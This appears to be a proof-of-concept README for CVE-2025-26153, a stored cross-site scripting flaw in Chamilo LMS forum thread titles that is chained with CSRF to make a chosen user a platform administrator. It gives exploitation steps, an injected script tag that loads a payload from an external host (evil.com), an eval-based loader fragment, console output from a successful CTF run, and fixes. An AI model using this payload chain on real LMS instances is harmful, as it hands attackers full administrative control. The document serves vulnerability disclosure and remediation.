
Chamilo-LMS (v2.0) CVE-2025-26153
This repository contains a proof of concept demonstrating a stored cross-site scripting (XSS) vulnerability in Chamilo LMS that can be exploited to achieve privilege escalation from a regular user to platform administrator. This vulnerability is indexed and patched: https://nvd.nist.gov/vuln/detail/CVE-2025-26153
Vulnerable Code Locations:
/public/main/forum/forumqualify.php - Line 277
$form->addLabel(get_lang('Thread'), $threadEntity->getTitle());
/public/main/forum/viewforum.php - Line 369
.$thread->getTitle().'</a>';
There are more!
Root Cause:
Step 1: Gather Target User Information
Social Network -> Personal Datauser_info and note the following information:
Step 2: Generate Custom Payload
python generate_payload.py
payload.js fileStep 3: Host Payload Externally
payload.js to a public hosting service:
Step 4: Access Social Groups
Social Network -> Social groupsStep 5: Join or Create Social Group
Step 6: Deploy XSS Payload
eval(x.responseText);x.send()">
YOUR-HOST-SERVER with your actual hosting URLStep 7: Trigger Privilege Escalation
Step 8: Confirm Privilege Escalation
The generate_payload.py script allows customization of the privilege escalation attack:
Input Parameters:
1. Attacker creates malicious forum thread
└── Title: <script src=//evil.com/payload.js></script>
2. Admin user browses forum and views thread
└── Browser loads and executes external JavaScript
3. Payload creates hidden form with privilege escalation data
└── Targets specific User ID for promotion to admin
4. Form auto-submits via CSRF attack
└── Uses admin's session cookies automatically
5. Target user becomes platform administrator
└── Attacker gains full platform control
Input Sanitization
// Before
$threadEntity->getTitle()
// After
htmlspecialchars($threadEntity->getTitle(), ENT_QUOTES, 'UTF-8')
Output Encoding
<!-- Before -->
{{ thread.title }}
<!-- After -->
{{ thread.title|escape }}
Content Security Policy
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
Monitor for:
IMPORTANT LEGAL NOTICE
This proof of concept is provided for educational and authorized security testing purposes only.
Discovery & Analysis: US Cyber Combine
Testing Environment: USCG CTF Environment
Console Output from Successful Attack:
XSS Payload loaded successfully!
Target User ID: 9
Current location: http://cve-hunting.ctf.uscybergames.com:8000/resources/usergroups/show/5
Form created with action: http://cve-hunting.ctf.uscybergames.com:8000/main/admin/user_edit.php?user_id=9
Submitting privilege escalation form for user_id 9
Form has 66 fields
Form submission triggered!
Fetch response status: 200